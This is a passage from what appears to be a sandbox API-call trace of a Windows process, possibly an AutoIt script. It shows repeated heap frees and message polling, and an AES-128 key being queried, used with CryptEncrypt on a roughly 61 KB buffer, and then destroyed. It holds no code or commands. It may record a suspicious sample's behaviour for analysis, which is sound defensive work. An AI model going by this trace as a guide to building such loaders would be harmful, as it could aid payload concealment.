(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0181.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0181.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0181.273] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0181.273] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0181.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.275] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0181.275] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0181.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0181.276] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.276] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0181.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.276] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.276] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.276] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0181.276] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.277] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.277] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.277] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.277] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.277] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.277] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.277] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.278] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xef06, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xef10) returned 1 [0181.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.278] CharLowerBuffW (in: lpsz="byte[61201]", cchLength=0xb | out: lpsz="byte[61201]") returned 0xb [0181.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.278] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.278] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.279] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6df18*, pdwDataLen=0x87e820*=0xef06, dwBufLen=0xef10 | out: pbData=0xa6df18*, pdwDataLen=0x87e820*=0xef10) returned 1 [0181.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.280] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.280] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.280] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.280] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.280] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.280] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.285] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.313] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.313] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.313] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0181.313] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.313] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.313] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0181.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.313] CryptDestroyKey (hKey=0x90aed8) returned 1 [0181.314] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.314] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.314] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.314] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.314] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.314] PeekMessageW (in: lpMsg=0x87f36c, 